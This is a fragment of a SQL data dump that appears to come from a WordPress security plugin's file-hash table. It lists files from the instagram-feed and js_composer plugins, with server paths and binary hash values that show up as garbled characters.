#ZNO2v','wp-content/plugins/instagram-feed/languages/instagram-feed-pl_PL.mo','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed-pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 8=qd','F*yCҶ@eiN\0','',0,'?'),('s*dzp+R','wp-content/plugins/instagram-feed/languages/instagram-feed-tr_TR.mo','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed-tr_TR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"vd_ 6',', ݑ\0׺Ӣh濛cz[;%','',0,'?'),('T,(]\nO','wp-content/plugins/instagram-feed/languages/instagram-feed.pot','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/languages/instagram-feed.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n\n~S`9ryX',' -d-\'A]7 @N>Ƃ>','',0,'?'),('56I\Zu,','wp-content/plugins/instagram-feed/templates/feed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/templates/feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Ć\05-jo','<36ԯ&3beŌ-\rA','',0,'?'),('#[:J','wp-content/plugins/instagram-feed/templates/footer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/templates/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xz=YV8H/','`(OΛoӋ/LOL:u[','',0,'?'),('pvY2pe_4','wp-content/plugins/instagram-feed/templates/header.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/templates/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MZ|ߴKLa)t','U@\\497LR#b\\5>D','',0,'?'),('?S|ՅE','wp-content/plugins/instagram-feed/templates/item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/templates/item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\0?X(<%{K&Z','/5L{\n\0X_H=m@BȬ\r}^fhI','',0,'?'),('DK{PbF8Ǎ','wp-content/plugins/instagram-feed/vendor/autoload.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[зkQv,l!<','4դ:\"YŤRyض W 谛','',0,'?'),('N,$ |,{','wp-content/plugins/instagram-feed/vendor/composer/ClassLoader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{0,Q6n','` sN.-ډGDT-\nt','',0,'?'),('R^\r(= y1','wp-content/plugins/instagram-feed/vendor/composer/InstalledVersions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fFi*f><','Mנkiy̨\'S\nV|TĴ','',0,'?'),('ޱ9w\'S6!','wp-content/plugins/instagram-feed/vendor/composer/LICENSE','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']_#D\0','\Z ے%4~N~Gh!b:wɌ\'','',0,'?'),('R^r;L*oan','wp-content/plugins/instagram-feed/vendor/composer/autoload_classmap.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ytP>RaS@-','u{4sJ3H6owr','',0,'?'),('H&ԦƮ kq','wp-content/plugins/instagram-feed/vendor/composer/autoload_namespaces.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5,}vĨ3G)','Er4@\0ԡ$z3$l\Z`iexl','',0,'?'),('Ϧ6F@\0A ','wp-content/plugins/instagram-feed/vendor/composer/autoload_psr4.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wCs\0*>','0 |-4{E\"n8y1','',0,'?'),(':J=: ȱ','wp-content/plugins/instagram-feed/vendor/composer/autoload_real.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QO=qmp','`-ll\"19ۧ@蕳','',0,'?'),(',qo\neO','wp-content/plugins/instagram-feed/vendor/composer/autoload_static.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z;[Al\Zz','\r&ZM\"\\\n!f lU6v>','',0,'?'),(' VwX\nz6`j','wp-content/plugins/instagram-feed/vendor/composer/installed.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','й\no5)}`x/%','zOWRsr=*בƱ&O','',0,'?'),('5,%&:','wp-content/plugins/instagram-feed/vendor/composer/installed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Uׂg+',') )XtW]&qB','',0,'?'),('qiqwk','wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/composer.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1s˱< o ~%1','PWy%Pi\n7\' Cà','',0,'?'),('^CC:\0 ','wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/src/Services/ServiceProvider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/src/Services/ServiceProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P7ؽo','wn]:?rzBs0','',0,'?'),('S%ڈ}{Gl','wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/src/Services/ServiceProviderInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/src/Services/ServiceProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KJٚq@=9V','Hd5sL:XÁuky&\"\0k?\Zl','',0,'?'),('*/Sg}s3R','wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/src/Traits/Singleton.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/vendor/smashballoon/stubs/src/Traits/Singleton.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"d܇,EKN%g','twʘ\nV;Fj/;x7','',0,'?'),('A*FM9Hj\n','wp-content/plugins/instagram-feed/widget.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','53c\\z2\"h','_9FCo GC\0@ՠP,fXQ7F','',0,'?'),('6WѓG\0','wp-content/plugins/instagram-feed/wpml-config.xml','/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/wpml-config.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']Ϭ~̚','#ap#Xe&`F_)-g<j','',0,'?'),('\r&\Z\nDVx ','wp-content/plugins/js_composer/assets/css/lib/monosocialiconsfont/fonts/MonoSocialIconsFont.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/css/lib/monosocialiconsfont/fonts/MonoSocialIconsFont.svg',0,'1܍*QHo*a','1܍*QHo*a','|_4=z\"&c(1p\ZK`Xy','',0,'?'),('`<&>ƹk\\:','wp-content/plugins/js_composer/assets/css/lib/typicons/src/font/typicons.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/css/lib/typicons/src/font/typicons.svg',0,'}}`r9Vrj<','}}`r9Vrj<','ͭՊ}yn O}tV(}iq=0N','',0,'?'),('BhDj7̈́q`','wp-content/plugins/js_composer/assets/css/lib/vc-entypo/fonts/vc_entypo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/css/lib/vc-entypo/fonts/vc_entypo.svg',0,'oѶp$Dž ','oѶp$Dž ','F5i?m%Jjy{mP\n Ol','',0,'?'),('xh/\"4K','wp-content/plugins/js_composer/assets/css/lib/vc-linecons/fonts/vc_linecons.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/css/lib/vc-linecons/fonts/vc_linecons.svg',0,'{M+jq/vh!q{','{M+jq/vh!q{','1|w6[sF-rS5Ǡ\\nqx','',0,'?'),('6{@xa O׌','wp-content/plugins/js_composer/assets/css/lib/vc-material/fonts/vc_material.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/css/lib/vc-material/fonts/vc_material.svg',0,'E\ZEVXz\rsQ','E\ZEVXz\rsQ','Qcg7v\\WYU k;L','',0,'?'),('jb+CzOV[kF','wp-content/plugins/js_composer/assets/css/lib/vc-open-iconic/fonts/vc_openiconic.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/css/lib/vc-open-iconic/fonts/vc_openiconic.svg',0,'Gf񤭧mN','Gf񤭧mN','!n~\Z>Zx^a䂚킬z*','',0,'?'),('jȿ!f','wp-content/plugins/js_composer/assets/fonts/vc_grid/vc_grid_v1.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/fonts/vc_grid/vc_grid_v1.svg',0,'O(Ն$V\'|F','O(Ն$V\'|F','*TOxUi_\06Uot','',0,'?'),('G݄um_MM','wp-content/plugins/js_composer/assets/fonts/vc_icons/fonts/VC-Icons.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/fonts/vc_icons/fonts/VC-Icons.svg',0,'C.kP<>\Z','C.kP<>\Z',',Y 5$ICq 1k','',0,'?'),('#{ݒ\Z','wp-content/plugins/js_composer/assets/fonts/vc_icons_v2/fonts/vcpb-plugin-icons.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/fonts/vc_icons_v2/fonts/vcpb-plugin-icons.svg',0,'hS\ZrFU','hS\ZrFU','JrI E(ibPrCh]]@','',0,'?'),('Aϴ#_nX','wp-content/plugins/js_composer/assets/js/dist/backend-actions.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/backend-actions.min.js',0,'LJO|qqb','LJO|qqb','?}I 2NCR!.#ҭ+','',0,'?'),('H>f>A_|','wp-content/plugins/js_composer/assets/js/dist/backend.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/backend.min.js',0,'.z|0#Lݎ','.z|0#Lݎ','E]?_3_X)BO͎=;','',0,'?'),('F1#:/m.i=','wp-content/plugins/js_composer/assets/js/dist/edit-form.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/edit-form.min.js',0,'^O^2_C0+ ','^O^2_C0+ ','^Cߵ=~uPuf5Sɹzɔ','',0,'?'),('BR?\r~uMg%','wp-content/plugins/js_composer/assets/js/dist/frontend-editor.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/frontend-editor.min.js',0,'BZ#нû','BZ#нû','KǃyWYF~\Zj@Eg(k;\\5uV','',0,'?'),('Sc! %.Kk*t','wp-content/plugins/js_composer/assets/js/dist/grid-builder.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/grid-builder.min.js',0,'ÑQb','ÑQb','*\"㷚=B>/=v:.Fuh','',0,'?'),('O#q6KU','wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js',0,'Zbr7[Xq31','Zbr7[Xq31','cf CHnJ1T7?[1#g','',0,'?'),('M>sr]\\','wp-content/plugins/js_composer/assets/js/dist/page_editable.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/dist/page_editable.min.js',0,'hTn&','Z,]\r>n&','xlRuT}$#g$p\"mJS','',0,'?'),('2,Ac>J HYG-','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_row_inner.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_row_inner.js',0,'oIamaKy> ','oIamaKy> ','l %$ .եwDYl!kܕb ','',0,'?'),('!gyD\nP1c3','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_section.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_section.js',0,'C!f܎[:d','C!f܎[:d','NhĎ2ƥj194(M*Ħ4','',0,'?'),('=yE&\rqHLP\"j','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_column_text.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_column_text.js',0,'X-#A#?J` ','X-#A#?J` ','FQ.','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_flickr.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_flickr.js',0,'aU?_rdP {','aU?_rdP {','vtE]9k#4 uQX*','',0,'?'),('qtKa','nza','xVwґ+Te$`f}~A\0','',0,'?'),('؞ %40nk','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tab.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tab.js',0,'\nC=1h','\nC=1h','݀Vkѣ\0;9~-R;\'tC|\'','',0,'?'),('\nX. U\ruv','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tabs.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tabs.js',0,'IȎyZ=','IȎyZ=','26DH\ZaOUda. ','',0,'?'),('c| {\\ۻ','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tour.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tour.js',0,':JbZ^M?i ',':JbZ^M?i ','R\n\01$;Y]](z۫G9','',0,'?'),('r|6a\Z6','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/vc_carousel.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/vc_carousel.js',0,'M7 8yYB\Z','M7 8yYB\Z','Y\0.&4Z5z8,=.%\nk','',0,'?'),('źkVTУ¶\r','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_basic_grid.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_basic_grid.js',0,'I{v3yF','I{v3yF','\\f;lU\'cC ','',0,'?'),('0YXIrAq@','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_masonry_grid.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_masonry_grid.js',0,'\\%z;U','\\%z;U','6y< }Q*^ \n_B `','',0,'?'),('$dv','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_masonry_media_grid.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_masonry_media_grid.js',0,'r3馓wSc^','r3馓wSc^','ЪA< ѯfSӯsCw','',0,'?'),('W3t7˂Xam','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_media_grid.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_media_grid.js',0,'э>5N;a-T','э>5N;a-T','X@?h9Ta.T 4*o|X','',0,'?'),('mjT%Wo`J(r','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_gallery.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_gallery.js',0,'auV\r5Bb\n','auV\r5Bb\n','Vnc99cLl\'9\\}HJjB9PI#΃','',0,'?'),('|\'?]0+E','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_pageable.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_pageable.js',0,'i@>xG](qA|','i@>xG](qA|',' 6;>\\pdC?K=x%8','',0,'?'),('W02)IiNk','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_section.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_section.js',0,',x#r',',x#r','>w^G\Z`\" W^ٽRގ;','',0,'?'),('1&ԍ0/J(?N','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_tabs.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_tabs.js',0,'N_TXBPY','N_TXBPY','0ҌNta-E3>P\"ɋ\"\'','',0,'?'),('l#\n6Q4','wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_tour.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_tour.js',0,'eϿ$c','eϿ$c','.QdUfбc\"sjg1]]','',0,'?'),('U&(f+9ӽ','wp-content/plugins/js_composer/assets/js/frontend_editor/vendors/plugins/jwplayer.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/frontend_editor/vendors/plugins/jwplayer.js',0,'\'ůdA?Xh','\'ůdA?Xh','-WVY.~!y(boQmK','',0,'?'),('\nPXl0ҭ5Bqz','wp-content/plugins/js_composer/assets/js/vendors/advanced_custom_fields.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/vendors/advanced_custom_fields.js',0,'$3׳}S{','$3׳}S{','SA\n]i|2=|_SpC','',0,'?'),('x)=Dum','wp-content/plugins/js_composer/assets/js/vendors/qtranslate_backend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/vendors/qtranslate_backend.js',0,'Xm𮝁','Xm𮝁','7pmgD~ q shd\Zl,f89C','',0,'?'),('\rE8\Z/Ԣu cV[d','wp-content/plugins/js_composer/assets/js/vendors/qtranslate_frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/js/vendors/qtranslate_frontend.js',0,'(;}EEw(r','(;}EEw(r','VS[','x`VʐO>','d\0.II}L뽜\rIEѕ^o','',0,'?'),('NQrӜ46DTe','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/affix.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/affix.min.js',0,'\"sH^tEJ','\"sH^tEJ','ᗮ~xF3+G5~\'Ejg','',0,'?'),('1 %gax}D# ','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/alert.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/alert.min.js',0,'\\c,WPDi','\\c,WPDi','_lޤ^Hl\ZV]e\'','',0,'?'),('\'754.S','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/button.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/button.min.js',0,'\'O@/','\'O@/','˄J&W؞R','HIg䁎>W؞R','Y̞ZAw\" ^P\Zbyz$4%','',0,'?'),('sGLg\'\\','wp-content/plugins/js_composer/assets/lib/bower/chartjs/Chart.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/chartjs/Chart.min.js',0,' `{8\rgt?~\0',' `{8\rgt?~\0','w[%cSם6#6|[2ôk6BD','',0,'?'),('Ty%m\rXj','wp-content/plugins/js_composer/assets/lib/bower/flexslider/fonts/flexslider-icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/flexslider/fonts/flexslider-icon.svg',0,'E\\E\"ĊuO\0#','E\\E\"ĊuO\0#','Aܠ&;pٟ&KUZ ByoC','',0,'?'),('w@*!.','wp-content/plugins/js_composer/assets/lib/bower/flexslider/jquery.flexslider-min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/flexslider/jquery.flexslider-min.js',0,'op1T^ O','op1T^ O','gA^҇c88?b ','',0,'?'),('MHElM^F','wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-brands-400.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-brands-400.svg',0,'>q4;\Zc1i','>q4;\Zc1i','.3 %u^@@94bkKPPT/','',0,'?'),('ѐNں\'G','wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-regular-400.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-regular-400.svg',0,' >ܯ8p',' >ܯ8p','Ҋt>\\ӡv\n?hnej]Nh','',0,'?'),('6p4\nZ\Z','wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-solid-900.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-solid-900.svg',0,'B7{Mn m','B7{Mn m','w%:ư9TwގxXpju','',0,'?'),('Ӂ*\nglY','wp-content/plugins/js_composer/assets/lib/bower/imagesloaded/imagesloaded.pkgd.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/imagesloaded/imagesloaded.pkgd.min.js',0,'.~3|WL*-`;X','.~3|WL*-`;X','(g[\nnuENηk','',0,'?'),('\0WBLf\r2','wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js',0,'8*>!U','8*>!U','5_X8J %A-JOXҴه','',0,'?'),('!*`^G','wp-content/plugins/js_composer/assets/lib/bower/jquery-ui-tabs-rotate/jquery-ui-tabs-rotate.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/jquery-ui-tabs-rotate/jquery-ui-tabs-rotate.min.js',0,'️B+p7]C','️B+p7]C','\ZTy@hP,R\Z/^)A','',0,'?'),('*\Zf7b\\','wp-content/plugins/js_composer/assets/lib/bower/json-js/json2.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/json-js/json2.min.js',0,'Ƌ!sPS','Ƌ!sPS','? Tg\'<wrT\Z~^','',0,'?'),('Q# U','wp-content/plugins/js_composer/assets/lib/bower/lessjs/dist/less.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/lessjs/dist/less.min.js',0,'Xa#0˸Mr]y','Xa#0˸Mr]y','>:p =s܆e6','',0,'?'),('&&{:/):5R','wp-content/plugins/js_composer/assets/lib/bower/masonry/dist/masonry.pkgd.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/masonry/dist/masonry.pkgd.min.js',0,'jo{e=˺~*Z߁','jo{e=˺~*Z߁','/R\nUfj1)a1\'qbJ\n','',0,'?'),('RLWp .','wp-content/plugins/js_composer/assets/lib/bower/nivoslider/jquery.nivo.slider.pack.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/nivoslider/jquery.nivo.slider.pack.js',0,'YI1Z=ue)._','YI1Z=ue)._',')7EZ6ő~GhT','',0,'?'),('\'','Vv{{E>\'','si(7՚s%}`)','',0,'?'),('5jsc>^Or,:f','wp-content/plugins/js_composer/assets/lib/bower/zoom/jquery.zoom.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/zoom/jquery.zoom.min.js',0,'w¹K%7PurS','w¹K%7PurS','\Zn`ͰHHn]`6=FE','',0,'?'),('+vb','wp-content/plugins/js_composer/assets/lib/owl-carousel2-dist/owl.carousel.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/owl-carousel2-dist/owl.carousel.min.js',0,'eCϜ?D','eCϜ?D','*EG*pUace`gpg6','',0,'?'),('8 -1rlk','wp-content/plugins/js_composer/assets/lib/php.default/php.default.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/php.default/php.default.min.js',0,'2ܜb>l;W|=','2ܜb>l;W|=','B>>[ҕ[8Y\nߩ\n$','',0,'?'),('7$^ZwEB[U','wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js',0,'> \n&ָ\n (','> \n&ָ\n (','w\'/\rh~\0@A8rBR','',0,'?'),('Qf#0Z?','wp-content/plugins/js_composer/assets/lib/vc-tta-autoplay/vc-tta-autoplay.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc-tta-autoplay/vc-tta-autoplay.min.js',0,'ae\r\"*','ae\r\"*',' `pۄȎ^-?jc11','',0,'?'),('үe+f','wp-content/plugins/js_composer/assets/lib/vc_accordion/vc-accordion.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_accordion/vc-accordion.min.js',0,'mm0ńύ)` ','mm0ńύ)` ','z} Lul8rI3~YD}','',0,'?'),('xWOÑum~','wp-content/plugins/js_composer/assets/lib/vc_carousel/fonts/glyphicons-halflings-regular.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_carousel/fonts/glyphicons-halflings-regular.svg',0,';1ޓ)y3Lɰ|n',';1ޓ)y3Lɰ|n','A !ޮy8tXw7?/`a/< sB5','',0,'?'),('lc{\0Ky','wp-content/plugins/js_composer/assets/lib/vc_carousel/js/transition.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_carousel/js/transition.min.js',0,'#H$`btu\n%<','#H$`btu\n%<','}ѥ竔ۆk\0V[a\n','',0,'?'),('#MB#.2\" 2^','wp-content/plugins/js_composer/assets/lib/vc_carousel/js/vc_carousel.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_carousel/js/vc_carousel.min.js',0,'ɑEnUeqUJH_','ɑEnUeqUJH_','k;x=ux<6.Sv.ܨ-vձ','',0,'?'),(' 8dӗE`\"M \Z','wp-content/plugins/js_composer/assets/lib/vc_chart/jquery.vc_chart.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_chart/jquery.vc_chart.min.js',0,'\'(lfjG','\'(lfjG','A1o9ԏY[p&k3E٧GʆyI','',0,'?'),('2:1Q֓o=& ','wp-content/plugins/js_composer/assets/lib/vc_image_zoom/vc_image_zoom.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_image_zoom/vc_image_zoom.min.js',0,'ƞԺv Ū','ƞԺv Ū',']Q8\rDc,[ɢpJ0L*k_:','',0,'?'),('w9Sԋ:6','wp-content/plugins/js_composer/assets/lib/vc_line_chart/vc_line_chart.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_line_chart/vc_line_chart.min.js',0,')58冈',')58冈',' W 77X7W,\rf:.fSu13\0j','',0,'?'),('VYϧ wc','wp-content/plugins/js_composer/assets/lib/vc_round_chart/vc_round_chart.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_round_chart/vc_round_chart.min.js',0,'C?z\0,a','C?z\0,a','? {7x$iuY+y$,k~}','',0,'?'),('sg;4SfG:o','wp-content/plugins/js_composer/assets/lib/vc_tabs/vc-tabs.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_tabs/vc-tabs.min.js',0,',a~<In',',a~<In','ƒ-zUíÉQjy8:,','',0,'?'),(')XI Ad','wp-content/plugins/js_composer/assets/lib/vc_waypoints/vc-waypoints.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_waypoints/vc-waypoints.min.js',0,'_a,9{','_a,9{','aN!i\'Y9 